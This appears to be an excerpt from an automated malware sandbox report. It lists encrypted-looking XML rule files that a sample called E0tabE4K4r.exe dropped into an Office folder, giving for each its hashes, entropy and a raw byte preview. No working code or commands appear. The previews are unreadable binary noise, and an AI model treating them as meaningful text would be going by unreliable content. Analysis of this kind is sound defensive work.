                                                                                                                                                  Preview:<?xmlNL...Ns...*.t...G[..h!;........5f.~.>r..}...n|...E..U.%6...........dY2.X+.x..v...N..#.V..~`......W..I[/.&.&...L+i.+..(.0..x..P...%.xr=.py8....A....3;.hj.0.N..9.\KO.jm0..j..........;..i.:....H)y1N.U...4.Zg*.BS........hCE .........Q....c...1K.e'.].<..L..@......t).T.t...m.C.-.vWCP...q:JX.....uU..G@.[....<.J..`....q@..h...q.....1w#.*.Xq.+.\....8.z.{fo..Z.....;/.}.....F....].......P!f6b.2<.u....|.2.....dW.., .;.Ei-..+^..'.C.3.-.....S.h....f..3W.fE..&8.K.8...P...=.S...q......U..yS..3.:On...w.f......R....iC..,...J..t..g......c.....qU....u...K.............w.FY.R..L.......|...'...d.}!....K.j.(..o.4.d...6...../&.b.......m.8..m.._s...k.R.CQ.H....VZCe....7...J.u.%..M...)..,J.Q.:'J.........dz..x;Kv.|.Uv..o.[..uY>.q.L..hA..icS.-LX..!..M....8+... ....1.>.o..$Cf...u.....I...-.o..LA&h-.8{7.F;O.m...e.4z.G.,X.....~..)...`..1.2...Qwv.0y..w..>v.^(+.XS.....'....d..2....^..a..z.6.?rd.,=@.Z..7^G?.1..(<...C.0.db.v]..;%BD..RuI.pJ.-..(I...,!WpU3.(

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11464v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):807
                                                                                                                                                  Entropy (8bit):7.7344013485805085
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:cPRMSWmwlStvooJc8F4qEZoK+rGxo+einV2bD:P7miIgWc8FnEuDrGxVeiuD
                                                                                                                                                  MD5:32830962CBB8AC0DB8E6E6D898931C51
                                                                                                                                                  SHA1:EDDC75B269DE92830D641D6ACBF7EFE202ABF41A
                                                                                                                                                  SHA-256:2BB51C80FDF394BA4A9A1AB2A78E54C5CBD7E3BCBCEE85F5FA7AB07065E6F6C8
                                                                                                                                                  SHA-512:F1CD4E3ACA4CE00AB7A4E558F2EB4889A7A1A59BAC0A43F295638B189ACD999E14DE3F44C9F525283CB2B25DB146107D9869AAA75AFB72BFC85CB3A667830760
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.`.T.(..R..0..4..^.....P.......(..Pr._....^. -..7.k4npXJ......,..a..J2..`0t....d.@5.V.|[.T.i8.yn..L..cd..1Xb......r.=..-..3.......p\...:k....O.n..Q..Xl..mM.Ri6V.......u....E..X%.|6....$..9W...../C0..../..'.......4..|0@...].*...-V$...t.j.g.Te..~..#.Y#....E5<...B.E...E.-.(a.9.n.D....09;...*^)?...)6....|...$[..Y'....<......l}{L.X...Tr..h..U....}.W.t.....OV/#...z.fkx..j.B..YD.Km.WJX.2...WO@.MF\+.K.=.-.....~.z.>8u.t..0.....~...P?q..~...D...7<.>.O;..'n....VR.!....u..ad...HDr.Sqx....n..c...".=X<a.?;....X...9.(....k..y.0Bnt.h.w.-....V.=..JS.y........M....@W...# ...C:.P..$F ..^.IWP.q5a...=...x.>4(|3...W3....7....(..-....f....-E....l..k.Y..#...b...lz..G..^.gtwoP..3.)../f.f.v..C%.Y.h$.+...J.....%.>.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule11498v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):747
                                                                                                                                                  Entropy (8bit):7.710968851163836
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:xAf+pM5z8zGyjbJhtNI+FeN9SRj75GWVrgGaOD4Z2uC5qgxJECh0uqpVSUdNciik:tQJyHDtmGoIhVrgGjD4m5P5Zf2bD
                                                                                                                                                  MD5:FD17372CB925C52609BF24235E19F93E
                                                                                                                                                  SHA1:B749320CDEA01B8404E47A0204238D2214B5F120
                                                                                                                                                  SHA-256:2FA7F0CD83A1FEE5FB8D747D880B876946B4B82AAC0B88A341BCEACEAC65B92C
                                                                                                                                                  SHA-512:7E351D906C669511A39ADBEF5BEE3F9B2EE440FB2105ECD6F820D17761DC6C02DA9D029302231D7E44101B2C0501A51285CE585FF56AE29F7D5127DDB08AD33A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml2.:.p..d[...j.".b.wp.....).K.D..0X.So....8.).k...U..;.....o..z...<.....m..;i{.S.@0........S..m......V>.t.\f.h.B.Hw0....;....J%.p.P...q.+"..qtK.........k'`..M0.i]z^.x|.x.d............Sj...7w..:...o>.]..Y.k.....E..RTN..\4.}.#kZ7|@vm".~>k......S..OE.T.......z...M....y..`.h.6..$.m.."(.Y\....E...].~...10p-....R.n.X7^...S.......`6^..C3.kL...n.}....(!...&.nlI."........FU.W..L.K.HI\.."i%..j...Y<.A.....jB4.%.....e.M....#..0..z...\.>F.....)...I..9[...KN).....@..Z]....S..{..o...v1..........H.S..q~..fj..c.&..4..r.0..o<ttN....Z...@......,....E...C....&Y+..5.z..'q.....M.../.eg.U.S'{...?.....Qx...a.g..8..y..I*K..;f....kXF4....S.H..[7..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703850v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1739
                                                                                                                                                  Entropy (8bit):7.881035163656454
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:VHEG9uMUV9v4rA25hEi4T46ynwUHWgHGRiJtchNgjt9jD7gVNvPsjTDuUWztBtdS:huM29AkaEi4T46wHWkCzIzgVJCPuUgaD
                                                                                                                                                  MD5:564742ADDAFF4EA2B389831BBAD763B6
                                                                                                                                                  SHA1:0747734A293D87E89CB2DAD0F6160DE4F70BD526
                                                                                                                                                  SHA-256:D447E509E1D8D4B1447DCDCEDB7E92F7336FBF8CD884FEA4F34DC7F78860CF2F
                                                                                                                                                  SHA-512:30BE6343B8932C17B25288F37769B26B15775A25A1F3A913890E11E8C20C1E3E1AD1F5671843DFE5C8C240357EB9BFF29E2CF77BD1FFF494BE8946FADC227743
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.<?.+2...H.z....;.......<9s.`,...{}..HI.....S?P.........a.I...N..m... ..jmn.S.....0.g..y..L...T......a....vd.{V.F...R0H..k..<|).H....2$..6.`Em.Zc......OW.....?...B.......e"z.... ...i...;.......pf..q!...;=..}......>$...|.La`.s.....i.Zf|..D.......^.2}......9.].(.W...U.@...U.xk..HJ@...!...p..+..Y..,...{W...IAM..Z...E$...#.4....>,..v}..>.......+j.e.<....H\......`.A...........R)...(...L..H]GkBh.m+$oE.jL.E..Mn.&z.J.p..8.2.....!&.u.c....T..Ci.v..^a....tn.....x.g.m........9...hn|...w.W.7.9Q.v......I.M^H..#......r{I".6..m..3.W.`_.8......./...#q.....V.".......in....C.X.W.9.IG4..$..a72..p..'^F.H....B[q.......T..y...#c.7.-.^..D.W7.h.sbW.GJv..ey..h....K......Z......2{`...O.[D.!5.y.+.>..c[r\..mS..@........+'....ns<GFZG...E.0N...).u..N.8..}Dq.m..p.WH......f.......j9..C.F.h....,J..2....y.J...)<..kz.....YJ}* .....4.LTe_Y....._z......u..]s....a......f.n..{..`.|NB..R..t.....;.........'.O.X.............b.....Qf....UQ...S...c|..vLJ&J,...~7.*...=d

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703851v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1776
                                                                                                                                                  Entropy (8bit):7.8902151804115075
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:e8NUaP4HqTih5goDWl+J9c3gduX66u+0rOxt91Q1VW6SvlD:P5v+h6SWiHdChu+0rMt9z
                                                                                                                                                  MD5:DA6B7CADD492AABB2BADB597A3A0C781
                                                                                                                                                  SHA1:A27A0C9CD0831970BD1076D726DD78A4A5B192D1
                                                                                                                                                  SHA-256:94546890881DC7FB1E2A17F4DD33B1B70E3DE6A8761E654A4E24CBA3BD37DF0E
                                                                                                                                                  SHA-512:E82ED49AD83E0E968664BBCA1D781CF672D8F707610836F2349F5A5519CEBAF9508EAAFE76E9863D2F04CD4A07EA4D8D8BA8C5174038807FC24D3BD0B2183DEB
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.<?.....elj.u...p....Jm..b.l.%....L....e...........VO..m.7A...,u..h..)...&....&...m....p!7...B..g...w.y$...t.A`.a.....@5.'....C.....'.....%...&..I...&..P....4........l..K..K.._.=.....ET.....=...@>^y..\R..F.....sf...)..p.-.r`...../..a.E..G.*p\..4YJ>.G^...X2e<...#..O.[.........x...~.1............q7.">.....u............,..S..y...U....s$..+.}.k1y....z..c.....*/.9.K............-....6.....g..".k...GrK.=.I.s..wx...<.~..1..0{.....vn}G9$O.....C..m%..CS3.o...E.'.!.W.F.y.[..zI8,......}u.:U..[bM(.S.xs.1....a..{.%...]..bC....2.g.d...O..['....#..Q..K..M...vz..tg........Cp..9..\..........D`..._"r..b..u.@..+..>.R.>.:.o..../.8$?...T.......~'J...xr....C9z..'..yJ8.A.9..a1o3.".8...`......a... .D..XH..AX....f...._k.)wl.b!.5$B.VU...D.. ....+...U^.Aiu.I.CX..d.ed.Hg..O..}..b\....e...+io.f...m..._.]..~+]..gy.ND.x..(.uT.]:.q.E...]_.c_.].\.....`!.7..v.f.H)......F0.'...:.....?...n..hN.....+..u..n...vf.Jo6......F...w.k...%.N.#...S.2."..g.2.R..x....c.G|i7......

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703900v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1724
                                                                                                                                                  Entropy (8bit):7.880143982329847
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:StbNA2Y2+wXcfIFAsFZWIDM5ukjPxvleHefj3TD:SdNAVPwXcfIM6rkjTpT
                                                                                                                                                  MD5:EACB03025683F33259E9D23018BE0479
                                                                                                                                                  SHA1:A0FDAF09A4D2C2FC95420F6D5AFCC6A04711A407
                                                                                                                                                  SHA-256:658D7C6B828EEA40D52C94E4D5F6DA073E9562322A03A8D94DE2EC6D1F0AF66C
                                                                                                                                                  SHA-512:5A0136D35B1C4F72B1197CF9B8A93DB64AB9787E94FA3758B696032478690ED44A33A2D44040DB5AC901BA423695DFE61AFE4F2A14EF4CA44AD9BBEF8F798515
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.<?...{.......=..]Va7;.RVr...n.....ka....4.....7w.@j..9...:...p.&.Q.iqO.3......(.S..P...p...88.......%...@..}-NTw.xBP.m.!.,.,...|.B..<..........}>...-{lh?.~$6.|.*`?.]......b...ZN3....*.}..!.l..\.2..^...l....g..r. ...2g...s.xM..D.t.O...zH.e.....".....sP...-......h..le....[....Swg.......w.......,.f...a\...#w.....I....s ..+...1...!c.aT..."..0..o%u..`F..|.l..B....,\...v...H...r/.....`......f6S!..H....K..o.HV..w{d...r.U.u.QPqq..&..!$QY....v.U'>. .......v_W.#iPf....f{C.Y.h*....8.g.9.L.z.Xr. gj~.ci.dd........@.!.k.8.H.2..U#.....3+~.S.j..TIc..xa...U..(y....[..U...rO........'"Y..;..n.l...p.).F.....;..4.xK....f.9.....f.;...*:Xqq_0d.&4[..<t........Q..nL....4....GH.6.2.d.?#........xH.^.-jU.t.P..A.#..^.)u../ZI.E..i...T...ir>..Q......%...^n`.f1...H....^.....e..5...QN.Z..=#.<...:.G....f.>.U.|f;....a. .9..G];.[.6.h.J.E9....G.1..k.Q....s.L.../...Ud...xM.....91.T.~.4..xi..<.S......x...KL.D.}..\.n$@8..q3.BQ.Q......_.?.....9k..b.J.:....`......[........

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703901v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1761
                                                                                                                                                  Entropy (8bit):7.8901991742272894
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:XlEeN9/9f0bgk+oVLtl10qme/EbC3rbnU+dSbKdsigLBN3zZcKDzYSLQJ+Qi/rl1:qcygQ30qmiE+3fULLL17Dzt/ZkfMDD
                                                                                                                                                  MD5:66BD9B185CAD79ADB3FB3FB5146CFC80
                                                                                                                                                  SHA1:1A15082D7FD3EC0854B71D4BF373AB5095217154
                                                                                                                                                  SHA-256:C8B716AE1AC84D6B32004008F19E7AD3CD9F97F776EB5E8FFDF1053E602A1236
                                                                                                                                                  SHA-512:7EE5693529413B61A4F341A6D6324E8F5B9D5C10DB179448BA764934418072BC6EAB1E04C89AC5823D2533F6CD8420D88BAD56C4B86B76F3041E68D9B7DEA1B2
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.<?q...M.....@e.../.......0.-...!|....S..?...r.l,.E.4..!..Q..../...d.@.L...A.J.....Ed._d: .}..Cx:..7..p...b_O.......u......F1..d[[......A.[.......hz[J..b..H3:.R.Yg.~.Cj.f.......9...&..`0..'..WH(.*xq...(.....X..:...aAt)R.s*i.\..7s.~)....mt...MTb.....%..l.........U..*.9..F..&]l.{._....E;5..)..."=.>S8.Fs.h...+.O.<q.....S?lr.uz..2-.k.B.....i.....1.M..M..I.d.p.a../..K.+...V.{.b..#...J...7~.g3......77..%.T.;%...Ifn#.E..A.XO.[. u5.....:9..:_h+..r..*..O..S...b>Ft3=.j...Qy.....g._wl..........I..>.7..f...J.dD....*){au....s.%.zn...Qm.+...x........VJG:."{..C....c>..w.g.U.u..._....%..2\.kg......'..9.#..L.u'..%&..x...|k^.R...&.<T.>....a.O@.b;K.)..Fi+.."..n.t.)...a.q..^.q~n...w/]9...G=oNt;.......".....Q.Gs..U......#G.%#.\%V.^...&.<......J/T1....KO*..)..c..Pn.....m.U.U....Wt6.,..x..t.S..$.K..3^|.,W.Z/.S]f..)...$={......O.;D...Q^..,.cu.!.G.M....w{`4}....cI.a.K.i.5.1...&.. +...l......`.?.t..7=3.6.e.Wv(......9.{0..;.M..oi.........n/..gV.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703950v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1700
                                                                                                                                                  Entropy (8bit):7.8876879961318815
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:IFLzrN8VWJQP4Aa2qKItja9Wkf3X0+U3MqGOE84NelVD:gtJQPNa6I5aA4XdkMBIt
                                                                                                                                                  MD5:6CF3D12CB7F8AFCBECFA0201DC5D60C7
                                                                                                                                                  SHA1:08F10E797810725D355D63D5B808E35EFCD60E80
                                                                                                                                                  SHA-256:C72ED4096A5CBAC9C8C4BE2832C97C3C1F64EAAC36563134C64358163F4F1237
                                                                                                                                                  SHA-512:C3BB30AF61ED15A4AFB2683FDEF78DAAAC792AC019CC60FEDB009ED39D481C50412EA0AC12E9B43AF181BCCB6A65F133FA0697F9441BB5ADA069D81D8E7D5679
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.<?..... .n.d...A.&..............*m..!.&.._..Z.r...B.p......lL..1.7c.(...F....tJ....^O...........@ZG.....|..8.....^4......e!i....n,.c.m..0.[5....&..`.X@....G9.L..x..v..`.V..5.......4...vX.Pb\..!&..B...0.M.hZ6P4P.T5B...c.)...X.L.j.7...8,..Q.Y..gk.....V."...b.s/..]r...p..xX.RDC...U......../..30.Ao.F.\.Ox.q.".....+..mO....w*......E6.~.*../.^M........r....O.p....9H...w..{}.v....J.....[j.$rf...j.R*..`.{3Ak..$q]U....|..dK..I1...^.s.Y..0#..9.a..`....-..][8]..b.C.3..,9......7.Z.*c....x3..M?...j.......d.Gd..WpR.....au.'.<...8..%.\.G.....z..:.f.T....<..56....D.v..........<.......(......<.^.V.w.q*z.....c)s.%........u-..L\...~t.M(...m...]...E.......R...Z......!.`..e..4>.f..|.2-a"9kO.:.......t...O..........C..<....WQUC4.0N_n..$...s/..4.....s.+.....S.%|......3..oi$H....q..?s.....y..,w..z..0............7...\:..z..KL1..U%.p......M.Z"..........3'.'...9..5a[.........^.B.....I..._.L..`.C ..fq...SHPDr.j..x.~.W.9UJu.)N.k.....3"D+.....1.}...L1..N..uL.<I...e..WVw2

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule703951v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1737
                                                                                                                                                  Entropy (8bit):7.890171576427721
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:6ugtF3LBUtn8RGxu3h88HZArUFt4zrwsuvR0+4K+a9yYS5SLmDs7IFJjH2zgR0zJ:eQRCnHZin/U0+4KjuSLmY8FQzgRWxlD
                                                                                                                                                  MD5:56A8B5A42D443EF71B3B913EB2EEFAE6
                                                                                                                                                  SHA1:F6EAD341A63A625D961D9476DAE4F9DEFFE75317
                                                                                                                                                  SHA-256:52DAC11C374E4B89828256CB6ADEC2A40790FF146D3123C1534E7238E982594D
                                                                                                                                                  SHA-512:3E1FA69B3D30AB3E56D83D281C1A593D8C85C28142190F0FF627DB9BC0BC2719F173EFEEE5C781BA147473107F397F1B7DCC2B2F7991234E133BB1D6C6BE8E56
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.<?...'...]........a....2xN.me..>.\..D....$.>pCk0E.iP..v..Q v....i.U..$..........p....l..........nNJo..3x`9.Ri..i>......BPj)....^..@....1]'gZ.....Y....q'...8....3LZkH..C(.xBQ..`. .(...Y\..-.W...jV..o...:"..*I....k.s.oQ~..._(.f...B..T.F.:.l..V.Z.M..,......G.*..9.#..=..s-._..u.=.....;.z...u..d(.@..e..T......a.Z..8......{.^/Z.......9/G......v._..h....}j...n}..5@..bO...V..5..6..4.!..a._.Y......U..-.6.<...Q..m...YK,...#ui.(L+`:..3..6...B.,.qQR4&"...J.-.].*..:.QF.t.y[.3,....TG.........d#...I....|xS.!.{...%=..*..y.0..2zb.n..sC..3.c...n...x.y..y..o.2%(...r)....c..S....r.8u(*.......i.....+/.A;.YD...|......^.o...R...{..\'.4P.k..9..`..(.f6ymU.s&........HK..r....<H"(...m.....%.....-,...A......|}."...E...6....{U.WQ......u..~+?..YM.G..u*^.e=E.P.Rm..e.{........A.@}."m....g..|.@.r.k...4ts...-.ee..q...].2QZ........-.Q..8.KN]]..|....D........../...5.....4j..m..W.7.I .t..%...a.e.Vv.P....."'..u9|.q..p..X.!...pX............ .>c.P...:.h.j.$Ib.o...h....|j..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704000v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1716
                                                                                                                                                  Entropy (8bit):7.899884333080868
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:rnuAPBtS5uqd5OaIJ9uxDr4h2vX6TrZFZ4TD:7HptWvdUPJAxDr4hikK/
                                                                                                                                                  MD5:01A301EB31EF0256E6AA80B4F7807FFE
                                                                                                                                                  SHA1:4D2DD7CEAF77AE7F85AE409CFD21B5CAC6F4E043
                                                                                                                                                  SHA-256:A7C786EC7BC6E1CB9AD135BBA1B5EBFA111560382AE90C4BCAB45DB09CA148C9
                                                                                                                                                  SHA-512:27DE73DCD11D425AD80B7B16D216AFBF68FFA096FF11105D1530157B8D65C560383471B43673B5A077CF8FA213D32A3408902008D8FA6EF003F90F1D822C7878
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.<?...K]..x....]]=...\./..t8.H4._7X..F.6]._....KPmW.S...v...).S..!....Z...J.6'..Fh.....TP1.9z.m..._.........)6.b5......*0F.M......L......Wb.?..B...HG@.)_...~..#~EBB...M..S.`..)....=....;.....X~E+..N&.$.+q.N.&..&....%..T#.\..A.?x..<A.#.1.).5A....V^._...E.)4Q....L.TxI.NE7...........WJ......YpH8g+.x}.....5....AD.>f.....7..|g....4.....M....%...*.c..9f.b..4...<..e.....'...P.....H.f....^`."t.Q......%-.b....n9.a.=..Q......z=..6<...m,.=..Z.:F...Av.\P...(H.....b..h.9..yZ...'~.....'C...+./.]. ..K.....H.o....a.;0.....!T`.Q....nJB.v$..R...bI..Z`..zJHYe8.N.t....a.....Y.z..!.....`!.D.<"..Z..Or..CR......^..JY.........NI.....9...7....m.c<..".DlXYW.I&...*1X..2...2.....:q......|..P~....e...............V...D...B.OJ..-*...#..R......e.K......Q..D.+W.E.o..#...g....cP..m.{.cE0.&L#.M....9....h.w..........(..a..#5o.g.......v...`w...Go..a.5.S.v.I.......5....M..%...L...M........>...|[...%[..=@l.s....yG.B.#qg=]...._^.....fQ....TO............m..)..>..E..e!..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704001v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1753
                                                                                                                                                  Entropy (8bit):7.902969306350635
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:/j4f0OKF7EPaWVTOTjnjwrr4kh1VxiifgrwcD:0KxwZgn24kXLiH5
                                                                                                                                                  MD5:7AA7042592A21F9A41C09C1FDD4BA65C
                                                                                                                                                  SHA1:C58E09D14CC8B69EE951A3C256BED15C63F9C276
                                                                                                                                                  SHA-256:03F1881C0E10A03F7D0D683A6732B1C78D5B4B7DEBBA9094AFB2F15DA7FD24DE
                                                                                                                                                  SHA-512:CD45F77270548186F88FE88CA3BD337EF9936E6FD020A951F27EB8A47B165AF3DF8FFA1A8DDC712B948650467F1E334AF58D8D71AAE6C63C31ADF14202A1B21F
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.<?..}.L)..(..u.....d#v#..2WK._...._-,Z<.*(t1K..rD..$e...N. ..t..Bx..CF2...Z...M...e.Nj;t.aT;G.{I|.c.......M.Q..>.....%.{......N...L.....\....;..... ...2..). ....:...A.KQ.0.......u..3K>*9.q..Nn..]..o........._..m`../.....j....x..'...!........'..0s..o-.Zqs..b...}gTkRO.*....0S.-.3..."..,[.O.J.8....(..z.......z...WS.-.{..L..@..Q./?Y......m..:.sl..m...V-..{.t......./.3.......!l.v....u..;R_..:e[.G0.Dr%~CwO......G4K.DVB.k....T...5o........t.T.8.....[a)Ik.S).Y.%.....*........X........".\x.i.....u....&Giq....Fe..^V..d.7X)...M.zQ...w.O..Q8.J..B....M..tZ...3.a%6..&..J......T_.....AJ.}Io.S...`.nM.Uw.C...=. .#...+ ........o.....S..,5.bJS...5...#!).M.km..j...8.A]..~.../."7...L.b;.9...f.....|94G.$..l...W...N@*....*..c=^.v.r9......4{.X....k.,g...........S.C...fp........!.......MH..O.U(.J.!T......`..G....n4sGd....'.K*.o...8......X...!J@.;F.I......y@.-,+0N..|..Kl..~.........$e.)o.U...w9.D.$.D.`.s_..j... ..]..Q.o..../4..!....9.b.H.`..*+......Oa..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704050v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1690
                                                                                                                                                  Entropy (8bit):7.87742951687723
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:O0e5uuPCB0kG+mC204Hci4oXcnT0SSzELbmru6ZyD:Op5uytkG+ROc/nkELbyuT
                                                                                                                                                  MD5:9A6DC773FD138C89540438227168019D
                                                                                                                                                  SHA1:C02DFF1C98FFCCD8799C35623E7DEAAD3C9607CD
                                                                                                                                                  SHA-256:21B523708C909BA79271FFEFF08E983BB3407255E34F3855ECAC2591D44F05BE
                                                                                                                                                  SHA-512:0FD49581EDFBB153F4DE723B06A2B5E2D43EB6805C2C1AE98834501B4A11FDCC1C82F253D980F82176DBEAE21C27D54C1E8925D0196AE0FEB29646A6440622E1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.<?.m..!.x.J<m..r...>..z.6.....a..B....cj|..is.k..'........S\X...x...wWO....k..F.|..Q*......W$a*9H}.>..ap.)L;U^...JNO.l7.V.vw..p9p....oa($b+5H*.....f?L...t...";..X..$..H8...,.=...A.f...S.AEQ..[G....1f.4p:=.zyD.^6.7<......r.G...u'.Ku..3q..!9..*...D.h.IJ..L..mb.W....$.s.......-<..h.4'].GN.<..)H...+....E..:..Q.....G...U.*...R...9.>..G6Lf.#.x....!..4.....x.....5JD$D@.[JEY6=..1..I.!;.;q_....[.^...r.z}..w. ....3..d...[v......b...,..;..@...U#...V,.........P \..$;d......`....N/.....*.c...5.U..%D.U^...+.....*C.....R>.....b..iZ<_..Iom8.....I. (..1.Du->..URU9..Rdr.@..E~....s......F...$.u"(m...S...H*.s@H...S...G..h.}....r..#...K.nq..\.......6.%.. .sF.2l....f..W.\.qU.4f...@..-.?E....C..jk.u....B..4J..0...i....6C.....BW.. zT.m}......8.....k3&x=.......t...=..8..H.h.....a.Gq...y.T..kz.....p..S&$..u.Yl...3.X....o$....x..9.zj1..?...~..>A........L.M.....^O.\_]{..SI...(....qM....>.....oop...c[..~h.dI...."O.o..R.py'C4.}#.....u...o.J.q......u.1tp..N.p>.K......b{_.B..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704051v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1727
                                                                                                                                                  Entropy (8bit):7.903189043424418
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:TKpG7QTdpHWonJZ4/t+DkQf/IVaD+br0QMI+IdtTb+Q189B1I0402bD:TKpGMTD2oJZ4kDkQXIVa+7MITS9BmVHD
                                                                                                                                                  MD5:271BBFC3121C48E1EDC18A7F937463A1
                                                                                                                                                  SHA1:0DA55C82A770F8AD3CC00562DEE793A082E34B1F
                                                                                                                                                  SHA-256:377CFE063C1E560944B8F76244BB3FA6AD2275EF204FD71A6E931EA42F7D9D9F
                                                                                                                                                  SHA-512:281ECBFEE27A11F6B40B10022DF8372D1066F2FA56BE8C418A174D5B7426D7B2DDBB6FF56C8569FD05DBE1895864C8601B71E2CC1098F37D4B771CE251C623DF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.<?.o.Ad`._.LR. .y#.K.........1....A.+AO..._y........:/-h....r[..:'I.jgg...).f.EjY.6..4}(...?94*.].k...s.gAr..2.1......5..._.9M.;.G.&.3|X-...K...3(.&..=_...y........|........]QS.~L..3.......`.....-T....6^..F.t......s]..VH.....d.?......b....ZlX..{..3.v..2U..%.i~.JJ..$.2(3.o....#.E.....;V;.h....nm./.}B.P.?\...\....N....0_ghE$.....Q.D!.OD>I....:9..l.B..:mp...A.l...Hs..2$c.M.%;.n..J..`q........g..W.T.L..Ze...r.$.<B'.|.............Q..l.w^-.>/.<r(.I.H.2......Fr.].A.`.j.'v'..QU>H.]....f%..Q..6......Y.O6..HJ.......J?)%b..FN.....q..T:d.P..qH..+Y1...3M...;[...4Y....w.{. 4.Q#.."'.^.2Z..70....4.....P...Z..'......1.Y}...mkGw7z.{p..3..P<[.B../.r.2.S....4..8..|.6s.#.A..C./V.....,.....|I.qgl.....M.[.....j.E.zo..q..6o.ir..KL%;bY.j.n<1.C'...1fE.|Y..K..$.R.F2.J..H}.*c.?.r.I.._-'...8o.8....5......x........0[....cI.7...D..n.T..;a.2 e...4.h.....l,5..A3.b.;%ZW........C...P..[.7.*.u....p....._..p.....Y..F.T..h.:..'..q.....G............&...?.4..=..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule704100v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
